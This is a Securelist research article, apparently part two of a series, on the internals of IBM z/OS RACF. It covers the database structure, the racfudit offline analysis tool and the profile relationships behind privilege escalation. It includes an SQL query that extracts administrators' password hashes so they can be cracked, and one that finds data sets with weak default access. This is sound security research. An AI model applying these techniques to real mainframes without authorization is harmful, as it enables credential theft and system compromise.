  154. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>In our <a href="https://securelist.com/zos-mainframe-pentesting/113427/" target="_blank" rel="noopener">previous article</a> we dissected penetration testing techniques for IBM z/OS mainframes protected by the Resource Access Control Facility (RACF) security package. In this second part of our research, we delve deeper into RACF by examining its decision-making logic, database structure, and the interactions between the various entities in this subsystem. To facilitate offline analysis of the RACF database, we have developed our own utility, racfudit, which we will use to perform possible checks and evaluate RACF configuration security. As part of this research, we also outline the relationships between RACF entities (users, resources, and data sets) to identify potential privilege escalation paths for z/OS users.</p>
  155. <p>This material is provided solely for educational purposes and is intended to assist professionals conducting authorized penetration tests.</p>
  156. <h2 id="racf-internal-architecture">RACF internal architecture</h2>
  157. <h3 id="overall-role">Overall role</h3>
  158. <div id="attachment_116875" style="width: 2643px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-scaled.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116875" class="size-full wp-image-116875" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-scaled.png" alt="z/OS access control diagram" width="2633" height="991" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-scaled.png 2633w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-300x113.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-1024x385.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-768x289.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-1536x578.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-2048x771.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-930x350.png 930w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-740x279.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-744x280.png 744w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222807/zos-mainframe1-scaled-1-800x301.png 800w" sizes="auto, (max-width: 2633px) 100vw, 2633px" /></a><p id="caption-attachment-116875" class="wp-caption-text">z/OS access control diagram</p></div>
  159. <p>To thoroughly analyze RACF, let&#8217;s recall its role and the functions of its components within the overall z/OS architecture. As illustrated in the diagram above, RACF can generally be divided into a service component and a database. Other components exist too, such as utilities for RACF administration and management, or the RACF Auditing and Reporting solution responsible for event logging and reporting. However, for a general understanding of the process, we believe these components are not strictly necessary. The RACF database stores information about z/OS users and the resources for which access control is configured. Based on this data, the RACF service component performs all necessary security checks when requested by other z/OS components and subsystems. RACF typically interacts with other subsystems through the System Authorization Facility (SAF) interface. Various z/OS components use SAF to authorize a user&#8217;s access to resources or to execute a user-requested operation. It is worth noting that while this paper focuses on the operating principle of RACF as the standard security package, other security packages like <a href="https://docs.broadcom.com/doc/ca-acf2" target="_blank" rel="noopener">ACF2</a> or <a href="https://docs.broadcom.com/doc/ca-top-secret" target="_blank" rel="noopener">Top Secret</a> can also be used in z/OS.</p>
  160. <p>Let&#8217;s consider an example of user authorization within the Time Sharing Option (<a href="https://www.ibm.com/docs/en/zos-basic-skills?topic=interfaces-what-is-tso" target="_blank" rel="noopener">TSO</a>) subsystem, the z/OS equivalent of a command line interface. We use an x3270 terminal emulator to connect to the mainframe. After successful user authentication in z/OS, the TSO subsystem uses SAF to query the RACF security package, checking that the user has permission to access the TSO resource manager. The RACF service queries the database for user information, which is stored in a user profile. If the database contains a record of the required access permissions, the user is authorized, and information from the user profile is placed into the address space of the new TSO session within the <a href="https://www.ibm.com/docs/en/zos/2.4.0?topic=areas-acee-accessor-environment-element" target="_blank" rel="noopener">ACEE</a> (Accessor Environment Element) control block. For subsequent attempts to access other z/OS resources within that TSO session, RACF uses the information in ACEE to make the decision on granting user access. SAF reads data from ACEE and transmits it to the RACF service. RACF makes the decision to grant or deny access, based on information in the relevant profile of the requested resource stored in the database. This decision is then sent back to SAF, which processes the user request accordingly. The process of querying RACF repeats for any further attempts by the user to access other resources or execute commands within the TSO session.</p>
  161. <p>Thus, RACF handles identification, authentication, and authorization of users, as well as granting privileges within z/OS.</p>
  162. <h3 id="racf-database-components">RACF database components</h3>
  163. <p>As discussed above, access decisions for resources within z/OS are made based on information stored in the RACF database. This data is kept in the form of records, or as RACF terminology puts it, profiles. These contain details about specific z/OS objects. While the RACF database can hold various profile types, four main types are especially important for security analysis:</p>
  164. <ol>
  165. <li><a href="https://www.ibm.com/docs/en/zos/2.5.0?topic=users-user-profiles" target="_blank" rel="noopener">User profile</a> holds user-specific information such as logins, password hashes, special attributes, and the groups the user belongs to.</li>
  166. <li><a href="https://www.ibm.com/docs/en/zos/2.5.0?topic=groups-group-profiles" target="_blank" rel="noopener">Group profile</a> contains information about a group, including its members, owner, special attributes, list of subgroups, and the access permissions of group members for that group.</li>
  167. <li><a href="https://www.ibm.com/docs/en/zos/2.5.0?topic=sets-data-set-profiles" target="_blank" rel="noopener">Data set profile</a> stores details about a data set, including access permissions, attributes, and auditing policy.</li>
  168. <li><a href="https://www.ibm.com/docs/en/zos/2.5.0?topic=resources-defining-profiles-general" target="_blank" rel="noopener">General resource profile</a> provides information about a resource or resource class, such as resource holders, their permissions regarding the resource, audit policy, and the resource owner.</li>
  169. </ol>
  170. <p>The RACF database contains numerous instances of these profiles. Together, they form a complex structure of relationships between objects and subjects within z/OS, which serves as the basis for access decisions.</p>
  171. <h4 id="logical-structure-of-racf-database-profiles">Logical structure of RACF database profiles</h4>
  172. <p>Each profile is composed of one or more segments. Different profile types utilize different segment types.</p>
  173. <p>For example, a user profile instance may contain the following segments:</p>
  174. <ul>
  175. <li>BASE: core user information in RACF (mandatory segment);</li>
  176. <li>TSO: user TSO-session parameters;</li>
  177. <li>OMVS: user session parameters within the z/OS UNIX subsystem;</li>
  178. <li>KERB: data related to the z/OS Network Authentication Service, essential for Kerberos protocol operations;</li>
  179. <li>and others.</li>
  180. </ul>
  181. <div id="attachment_116876" style="width: 1486px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116876" class="size-full wp-image-116876" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2.png" alt="User profile segments" width="1476" height="703" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2.png 1476w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-300x143.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-1024x488.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-768x366.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-735x350.png 735w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-740x352.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-588x280.png 588w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-800x381.png 800w" sizes="auto, (max-width: 1476px) 100vw, 1476px" /></a><p id="caption-attachment-116876" class="wp-caption-text">User profile segments</p></div>
  182. <p>Different segment types are distinguished by the set of fields they store. For instance, the BASE segment of a user profile contains the following fields:</p>
  183. <ul>
  184. <li>PASSWORD: the user&#8217;s password hash;</li>
  185. <li>PHRASE: the user&#8217;s password phrase hash;</li>
  186. <li>LOGIN: the user&#8217;s login;</li>
  187. <li>OWNER: the owner of the user profile;</li>
  188. <li>AUTHDATE: the date of the user profile creation in the RACF database;</li>
  189. <li>and others.</li>
  190. </ul>
  191. <p>The PASSWORD and PHRASE fields are particularly interesting for security analysis, and we will dive deeper into these later.</p>
  192. <h3 id="racf-database-structure">RACF database structure</h3>
  193. <p>It is worth noting that the RACF database is stored as a specialized data set with a specific format. Grasping this format is very helpful when analyzing the DB and mapping the relationships between z/OS objects and subjects.</p>
  194. <p>As discussed in our <a href="https://securelist.com/zos-mainframe-pentesting/113427/#authorized-program-facility" target="_blank" rel="noopener">previous article</a>, a data set is the mainframe equivalent of a file, composed of a series of blocks.</p>
  195. <div id="attachment_116877" style="width: 1035px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116877" class="size-full wp-image-116877" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3.png" alt="RACF DB structure" width="1025" height="672" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3.png 1025w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-300x197.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-768x504.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-534x350.png 534w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-740x485.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-427x280.png 427w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-800x524.png 800w" sizes="auto, (max-width: 1025px) 100vw, 1025px" /></a><p id="caption-attachment-116877" class="wp-caption-text">RACF DB structure</p></div>
  196. <p>The image above illustrates the RACF database structure, detailing the data blocks and their offsets. From the RACF DB analysis perspective, and when subsequently determining the relationships between z/OS objects and subjects, the most critical blocks include:</p>
  197. <ul>
  198. <li>The header block, or inventory control block (ICB), which contains various metadata and pointers to all other data blocks within the RACF database. By reading the ICB, you gain access to the rest of the data blocks.</li>
  199. <li>Index blocks, which form a singly linked list that contains pointers to all profiles and their segments in the RACF database – that is, to the information about all users, groups, data sets, and resources.</li>
  200. <li>Templates: a crucial data block containing templates for all profile types (user, group, data set, and general resource profiles). The templates list fields and specify their format for every possible segment type within the corresponding profile type.</li>
  201. </ul>
  202. <p>Upon dissecting the RACF database structure, we identified the need for a utility capable of extracting all relevant profile information from the DB, regardless of its version. This utility would also need to save the extracted data in a convenient format for offline analysis. Performing this type of analysis provides a comprehensive picture of the relationships between all objects and subjects for a specific z/OS installation, helping uncover potential security vulnerabilities that could lead to privilege escalation or lateral movement.</p>
  203. <h2 id="utilities-for-racf-db-analysis">Utilities for RACF DB analysis</h2>
  204. <p>At the previous stage, we defined the following functional requirements for an RACF DB analysis utility:</p>
  205. <ol>
  206. <li>The ability to analyze RACF profiles offline without needing to run commands on the mainframe</li>
  207. <li>The ability to extract exhaustive information about RACF profiles stored in the DB</li>
  208. <li>Compatibility with various RACF DB versions</li>
  209. <li>Intuitive navigation of the extracted data and the option to present it in various formats: plaintext, JSON, SQL, etc.</li>
  210. </ol>
  211. <h3 id="overview-of-existing-racf-db-analysis-solutions">Overview of existing RACF DB analysis solutions</h3>
  212. <p>We started by analyzing off-the-shelf tools and evaluating their potential for our specific needs:</p>
  213. <ul>
  214. <li><a href="https://github.com/willstruggle/john/blob/master/racf2john" target="_blank" rel="noopener">Racf2john</a> extracts user password hashes (from the PASSWORD field) encrypted with the DES and KDFAES algorithms from the RACF database. While this was a decent starting point, we needed more than just the PASSWORD field; specifically, we also needed to retrieve content from other profile fields like PHRASE.</li>
  215. <li><a href="https://github.com/mainframed/racf2sql" target="_blank" rel="noopener">Racf2sql</a> takes an RACF DB dump as input and converts it into an SQLite database, which can then be queried with SQL. This is convenient, but the conversion process risks losing data critical for z/OS security assessment and identifying misconfigurations. Furthermore, the tool requires a database dump generated by the z/OS <a href="https://www.ibm.com/docs/en/zos/2.1.0?topic=database-using-racf-unload-utility-irrdbu00" target="_blank" rel="noopener">IRRDBU00</a> utility (part of the RACF security package) rather than the raw database itself.</li>
  216. <li><a href="https://www.ibm.com/docs/en/zos/2.1.0?topic=interfaces-irrxutil-rexx-interface-r-admin-extract" target="_blank" rel="noopener">IRRXUTIL</a> allows querying the RACF DB to extract information. It is also part of the RACF security package. It can be conveniently used with a <a href="https://github.com/lnlyssg/IRRXUTIL" target="_blank" rel="noopener">set of scripts</a> written in REXX (an interpreted language used in z/OS). However, these scripts demand elevated privileges (access to one or more IRR.RADMIN.** resources in the FACILITY resource class) and must be executed directly on the mainframe, which is unsuitable for the task at hand.</li>
  217. <li><a href="https://github.com/lnlyssg/zos/blob/main/racf_debug_cleanup.c" target="_blank" rel="noopener">Racf_debug_cleanup.c</a> directly analyzes a RACF DB from a data set copy. A significant drawback is that it only parses BASE segments and outputs results in plaintext.</li>
  218. </ul>
  219. <p>As you can see, existing tools don&#8217;t satisfy our needs. Some utilities require direct execution on the mainframe. Others operate on a data set copy and extract incomplete information from the DB. Moreover, they rely on hardcoded offsets and signatures within profile segments, which can vary across RACF versions. Therefore, we decided to develop our own utility for RACF database analysis.</p>
  220. <h3 id="introducing-racfudit">Introducing racfudit</h3>
  221. <p>We have written our own platform-independent utility <a href="https://github.com/klsecservices/racfudit" target="_blank" rel="noopener">racfudit</a> in Golang and tested it across various z/OS versions (1.13, 2.02, and 3.1). Below, we delve into the operating principles, capabilities and advantages of our new tool.</p>
  222. <h4 id="extracting-data-from-the-racf-db">Extracting data from the RACF DB</h4>
  223. <p>To analyze RACF DB information offline, we first needed a way to extract structured data. We developed a two-stage approach for this:</p>
  224. <ul>
  225. <li>The first stage involves analyzing the templates stored within the RACF DB. Each template describes a specific profile type, its constituent segments, and the fields within those segments, including their type and size. This allows us to obtain an up-to-date list of profile types, their segments, and associated fields, regardless of the RACF version.</li>
  226. <li>In the second stage, we traverse all index blocks to extract every profile with its content from the RACF DB. These collected profiles are then processed and parsed using the templates obtained in the first stage.</li>
  227. </ul>
  228. <p>The first stage is crucial because RACF DB profiles are stored as unstructured byte arrays. The templates are what define how each specific profile (byte array) is processed based on its type.</p>
  229. <p>Thus, we defined the following algorithm to extract structured data.</p>
  230. <div id="attachment_116878" style="width: 2148px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116878" class="size-full wp-image-116878" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4.png" alt="Extracting data from the RACF DB using templates" width="2138" height="1018" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4.png 2138w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-300x143.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-1024x488.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-768x366.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-1536x731.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-2048x975.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-735x350.png 735w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-740x352.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-588x280.png 588w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-800x381.png 800w" sizes="auto, (max-width: 2138px) 100vw, 2138px" /></a><p id="caption-attachment-116878" class="wp-caption-text">Extracting data from the RACF DB using templates</p></div>
  231. <ol>
  232. <li>We offload the RACF DB from the mainframe and read its header block (ICB) to determine the location of the templates.</li>
  233. <li>Based on the template for each profile type, we define an algorithm for structuring specific profile instances according to their type.</li>
  234. <li>We use the content of the header block to locate the index blocks, which store pointers to all profile instances.</li>
  235. <li>We read all profile instances and their segments sequentially from the list of index blocks.</li>
  236. <li>For each profile instance and its segments we read, we apply the processing algorithm based on the corresponding template.</li>
  237. <li>All processed profile instances are saved in an intermediate state, allowing for future storage in various formats, such as plaintext or SQLite.</li>
  238. </ol>
  239. <p>The advantage of this approach is its version independence. Even if templates and index blocks change their structure across RACF versions, our utility will not lose data because it dynamically determines the structure of each profile type based on the relevant template.</p>
  240. <h4 id="analyzing-extracted-racf-db-information">Analyzing extracted RACF DB information</h4>
  241. <p>Our racfudit utility can present collected RACF DB information as an SQLite database or a plaintext file.<br />
  242. <div id="attachment_116901" style="width: 772px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116901" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics.png" alt="RACF DB information as an SQLite DB (top) and text data (bottom)" width="762" height="993" class="size-full wp-image-116901" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics.png 762w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-230x300.png 230w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-269x350.png 269w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-740x964.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-215x280.png 215w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-691x900.png 691w" sizes="auto, (max-width: 762px) 100vw, 762px" /></a><p id="caption-attachment-116901" class="wp-caption-text">RACF DB information as an SQLite DB (top) and text data (bottom)</p></div>
  243. <p>Using SQLite, you can execute SQL queries to identify misconfigurations in RACF that could be exploited for privilege escalation, lateral movement, bypassing access controls, or other pentesting tactics. It is worth noting that the set of SQL queries used for processing information in SQLite can be adapted to validate current RACF settings against <a href="https://www.ibm.com/support/pages/ibm-security-zsecure-31-compliance-standards-march-2025" target="_blank" rel="noopener">security standards</a> and <a href="https://mainframestig.com/wp-content/uploads/2023/02/CIS_IBM_z_OS_V2R5_with_RACF_Benchmark_v1.0.0.pdf" target="_blank" rel="noopener">best practices</a>. Let&#8217;s look at some specific examples of how to use the racfudit utility to uncover security issues.</p>
  244. <h5 id="collecting-password-hashes">Collecting password hashes</h5>
  245. <p>One of the primary goals in penetration testing is to get a list of administrators and a way to authorize using their credentials. This can be useful for maintaining persistence on the mainframe, moving laterally to other mainframes, or even pivoting to servers running different operating systems. Administrators are typically found in the SYS1 group and its subgroups. The example below shows a query to retrieve hashes of passwords (PASSWORD) and password phrases (PHRASE) for privileged users in the SYS1 group.</p>
  246. <pre class="urvanov-syntax-highlighter-plain-tag">select ProfileName,PHRASE,PASSWORD,CONGRPNM from USER_BASE where CONGRPNM LIKE "%SYS1%";</pre> </p>
  247. <p>Of course, to log in to the system, you need to crack these hashes to recover the actual passwords. We cover that in more detail below.</p>
  248. <h5 id="searching-for-inadequate-uacc-control-in-data-sets">Searching for inadequate UACC control in data sets</h5>
  249. <p>The universal access authority (UACC) defines the default access permissions to the data set. This parameter specifies the level of access for all users who do not have specific access permissions configured. Insufficient control over UACC values can pose a significant risk if elevated access permissions (UPDATE or higher) are set for data sets containing sensitive data or for <a href="https://securelist.com/zos-mainframe-pentesting/113427/#authorized-program-facility" target="_blank" rel="noopener">APF libraries</a>, which could allow privilege escalation. The query below helps identify data sets with default ALTER access permissions, which allow users to read, delete and modify the data set.</p>
  250. <pre class="urvanov-syntax-highlighter-plain-tag">select ProfileName, UNIVACS from DATASET_BASE where UNIVACS LIKE "1%";</pre> </p>
  251. <p>The UACC field is not present only in data set profiles; it is also found in other profile types. Weak control in the configuration of this field can give a penetration tester access to resources.</p>
  252. <h2 id="racf-profile-relationships">RACF profile relationships</h2>
  253. <p>As mentioned earlier, various RACF entities have relationships. Some are explicitly defined; for example, a username might be listed in a group profile within its member field (USERID field). However, there are also implicit relationships. For instance, if a user group has UPDATE access to a specific data set, every member of that group implicitly has write access to that data set. This is a simple example of implicit relationships. Next, we delve into more complex and specific relationships within the RACF database that a penetration tester can exploit.</p>
  254. <h3 id="racf-profile-fields">RACF profile fields</h3>
  255. <p>A deep dive into RACF internal architecture reveals that misconfigurations of access permissions and other attributes for various RACF entities can be difficult to detect and remediate in some scenarios. These seemingly minor errors can be critical, potentially leading to mainframe compromise. The explicit and implicit relationships within the RACF database collectively define the mainframe&#8217;s current security posture. As mentioned, each profile type in the RACF database has a unique set of fields and attributes that describe how profiles relate to one another. Based on these fields and attributes, we have compiled lists of key fields that help build and analyze relationship chains.</p>
  256. <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6.png" class="magnificImage"><img loading="lazy" decoding="async" class="size-full wp-image-116880" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6.png" width="1244" height="1244" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6.png 1244w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-300x300.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-1024x1024.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-768x768.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-350x350.png 350w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-740x740.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-280x280.png 280w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-800x800.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-50x50.png 50w" sizes="auto, (max-width: 1244px) 100vw, 1244px" /></a>
  257. <em>User profile fields</em></p>
  258. <ul>
  259. <li>SPECIAL: indicates that the user has privileges to execute any RACF command and grants them full control over all profiles in the RACF database.</li>
  260. <li>OPERATIONS: indicates whether the user has authorized access to all RACF-protected resources of the DATASET, DASDVOL, GDASDVOL, PSFMPL, TAPEVOL, VMBATCH, VMCMD, VMMDISK, VMNODE, and VMRDR classes. While actions for users with this field specified are subject to certain restrictions, in a penetration testing context the OPERATIONS field often indicates full data set access.</li>
  261. <li>AUDITOR: indicates whether the user has permission to access audit information.</li>
  262. <li>AUTHOR: the creator of the user. It has certain privileges over the user, such as the ability to change their password.</li>
  263. <li>REVOKE: indicates whether the user can log in to the system.</li>
  264. <li>Password TYPE: specifies the hash type (DES or KDFAES) for passwords and password phrases. This field is not natively present in the user profile, but it can be created based on how different passwords and password phrases are stored.</li>
  265. <li>Group-SPECIAL: indicates whether the user has full control over all profiles within the scope defined by the group or groups field. This is a particularly interesting field that we explore in more detail below.</li>
  266. <li>Group-OPERATIONS: indicates whether the user has authorized access to all RACF-protected resources of the DATASET, DASDVOL, GDASDVOL, PSFMPL, TAPEVOL, VMBATCH, VMCMD, VMMDISK, VMNODE and VMRDR classes within the scope defined by the group or groups field.</li>
  267. <li>Group-AUDITOR: indicates whether the user has permission to access audit information within the scope defined by the group or groups field.</li>
  268. <li>CLAUTH (class authority): allows the user to create profiles within the specified class or classes. This field enables delegation of management privileges for individual classes.</li>
  269. <li>GROUPIDS: contains a list of groups the user belongs to.</li>
  270. <li>UACC (universal access authority): defines the UACC value for new profiles created by the user.</li>
  271. </ul>
  272. <p><em>Group profile fields</em></p>
  273. <ul>
  274. <li>UACC (universal access authority): defines the UACC value for new profiles that the user creates when connected to the group.</li>
  275. <li>OWNER: the creator of the group. The owner has specific privileges in relation to the current group and its subgroups.</li>
  276. <li>USERIDS: the list of users within the group. The order is essential.</li>
  277. <li>USERACS: the list of group members with their respective permissions for access to the group. The order is essential.</li>
  278. <li>SUPGROUP: the name of the superior group.</li>
  279. </ul>
  280. <p><em>General resource and data set profile fields</em></p>
  281. <ul>
  282. <li>UACC (universal access authority): defines the default access permissions to the resource or data set.</li>
  283. <li>OWNER: the creator of the resource or data set, who holds certain privileges over it.</li>
  284. <li>WARNING: indicates whether the resource or data set is in WARNING mode.</li>
  285. <li>USERIDS: the list of user IDs associated with the resource or data set. The order is essential.</li>
  286. <li>USERACS: the list of users with access permissions to the resource or data set. The order is essential.</li>
  287. </ul>
  288. <h3 id="racf-profile-relationship-chains">RACF profile relationship chains</h3>
  289. <p>The fields listed above demonstrate the presence of relationships between RACF profiles. We have decided to name these relationships similarly to those used in <a href="https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html" target="_blank" rel="noopener">BloodHound</a>, a popular tool for analyzing Active Directory misconfigurations. Below are some examples of these relationships – the list is not exhaustive.</p>
  290. <ul>
  291. <li>Owner: the subject owns the object.</li>
  292. <li>MemberOf: the subject is part of the object.</li>
  293. <li>AllowJoin: the subject has permission to add itself to the object.</li>
  294. <li>AllowConnect: the subject has permission to add another object to the specified object.</li>
  295. <li>AllowCreate: the subject has permission to create an instance of the object.</li>
  296. <li>AllowAlter: the subject has the ALTER privilege for the object.</li>
  297. <li>AllowUpdate: the subject has the UPDATE privilege for the object.</li>
  298. <li>AllowRead: the subject has the READ privilege for the object.</li>
  299. <li>CLAuthTo: the subject has permission to create instances of the object as defined in the CLAUTH field.</li>
  300. <li>GroupSpecial: the subject has full control over all profiles within the object&#8217;s scope of influence as defined in the group-SPECIAL field.</li>
  301. <li>GroupOperations: the subject has permissions to perform certain operations with the object as defined in the group-OPERATIONS field.</li>
  302. <li>ImpersonateTo: the subject grants the object the privilege to perform certain operations on the subject&#8217;s behalf.</li>
  303. <li>ResetPassword: the subject grants another object the privilege to reset the password or password phrase of the specified object.</li>
  304. <li>UnixAdmin: the subject grants superuser privileges to the object in z/OS UNIX.</li>
  305. <li>SetAPF: the subject grants another object the privilege to set the APF flag on the specified object.</li>
  306. </ul>
  307. <p>These relationships serve as edges when constructing a graph of subject–object interconnections. Below are examples of potential relationships between specific profile types.</p>
  308. <div id="attachment_116881" style="width: 1568px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116881" class="size-full wp-image-116881" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7.png" alt="Examples of relationships between RACF profiles" width="1558" height="1254" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7.png 1558w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-300x241.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-1024x824.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-768x618.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-1536x1236.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-435x350.png 435w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-740x596.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-348x280.png 348w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-800x644.png 800w" sizes="auto, (max-width: 1558px) 100vw, 1558px" /></a><p id="caption-attachment-116881" class="wp-caption-text">Examples of relationships between RACF profiles</p></div>
  309. <p>Visualizing and analyzing these relationships helped us identify specific chains that describe potential RACF security issues, such as a path from a low-privileged user to a highly-privileged one. Before we delve into examples of these chains, let&#8217;s consider another interesting and peculiar feature of the relationships between RACF database entities.</p>
  310. <h3 id="implicit-racf-profile-relationships">Implicit RACF profile relationships</h3>
  311. <p>We have observed a fascinating characteristic of the group-SPECIAL, group-OPERATIONS, and group-AUDITOR fields within a user profile. If the user has any group specified in one of these fields, that group&#8217;s scope of influence <a href="https://www.ibm.com/docs/en/zos/2.2.0?topic=level-scope-authority-users-group-attributes" target="_blank" rel="noopener">extends</a> the user&#8217;s own scope.</p>
